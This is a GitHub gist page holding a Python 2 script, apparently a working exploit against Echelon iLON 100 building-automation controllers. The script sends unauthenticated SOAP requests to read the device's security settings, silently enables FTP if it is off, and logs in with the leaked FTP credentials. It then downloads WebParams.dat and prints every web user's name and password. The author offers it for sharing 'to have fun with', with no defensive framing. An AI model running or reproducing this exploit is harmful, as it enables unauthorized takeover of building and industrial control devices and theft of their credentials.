Skip to content

Instantly share code, notes, and snippets.

@Mechazawa

Mechazawa/ilon.py

Last active August 29, 2015 14:17
Show Gist options
  • Save Mechazawa/cbe1968f228087deed3f to your computer and use it in GitHub Desktop.
Save Mechazawa/cbe1968f228087deed3f to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ilon.py
import sys
import httplib
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape
from ftplib import FTP
import re
"""
Terrible code ahead
We found this exploit ages ago. Never found out if anyone else knew
about this. It's a fun little exploit though. You can share it if
you want just don't forget to have fun with it.
"""
ip = sys.argv[1]
port = int(sys.argv[2])
if port == 443:
conn = httplib.HTTPSConnection(ip, port)
else:
conn = httplib.HTTPConnection(ip, port)
req = """<?xml version="1.0" encoding="utf-8"?>
<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<Header>
<messageProperties xmlns="http://wsdl.echelon.com/web_services_ns/ilon100/v4.0/message/"></messageProperties>
</Header>
<Body>
<SystemService_Read_Info xmlns="http://wsdl.echelon.com/web_services_ns/ilon100/v4.0/message/">
<Item>
<UCPTsystemInfoType>SI_SECURITY</UCPTsystemInfoType>
</Item>
</SystemService_Read_Info>
</Body>
</Envelope>"""
conn.request("POST", "/WSDL/iLON100.WSDL", req, {
"MessageType" : "CALL",
"SOAPAction" : "http://wsdl.echelon.com/web_services_ns/ilon100/v4.0/action/SystemService_Read_Info",
"Content-Type": "text/xml, charset=UTF-8"
})
response = conn.getresponse().read()
with open('out.xml', 'w') as f: f.write(response)
et1 = ET.fromstring(response)
et2 = ET.fromstring(et1[1][0][0].text)
data = et2[0]
if data.find('UCPTftpEnable').text != "1":
print "FTP is disabled, attempting to enable"
data.find('UCPTftpEnable').text = "1"
req = """<?xml version="1.0" encoding="utf-8" ?>
<Envelope xmlns="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<Header>
<messageProperties xmlns="http://wsdl.echelon.com/web_services_ns/ilon100/v4.0/message/">
</messageProperties>
</Header>
<Body>
<SystemService_Write_Info xmlns="http://wsdl.echelon.com/web_services_ns/ilon100/v4.0/message/">
<Data>""" + escape(ET.tostring(et2)) + """</Data>
</SystemService_Write_Info>
</Body>
</Envelope>"""
with open('req.xml', 'w') as f: f.write(req)
conn.request("POST", "/WSDL/iLON100.WSDL", req, {
"MessageType" : "CALL",
"SOAPAction" : "http://wsdl.echelon.com/web_services_ns/ilon100/v4.0/action/SystemService_Write_Info",
"Content-Type": "text/xml, charset=UTF-8"
})
conn.getresponse().read()
username = data.find('UCPTftpUserName').text
password = data.find('UCPTftpPassword').text
port = int(data.find('UCPTftpPort').text)
print("FTP Username: " + username + " Password: " + password + " Port: " + str(port))
def gotLine(line):
global section
match = re.match(r'^\((.*)\)', line)
if match:
section = match.group(1)
else:
if section == "Users":
match = re.match(r'^([^:\r\n]*):([^:\r\n]*):([^:\r\n]*)', line)
print "Username: " + match.group(2) + " Password: " + match.group(3) + " Group: " + match.group(1)
elif section == "Realms":
match = re.match(r'^([^:\r\n]*):([^:\r\n]*):[^:\r\n]*', line)
print "Realm URL: " + match.group(1) + " Group: " + match.group(2)
print "Fetching config:"
ftp = FTP()
ftp.connect(ip, port)
ftp.login(username, password)
section = ""
ftp.retrlines('RETR WebParams.dat', gotLine)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment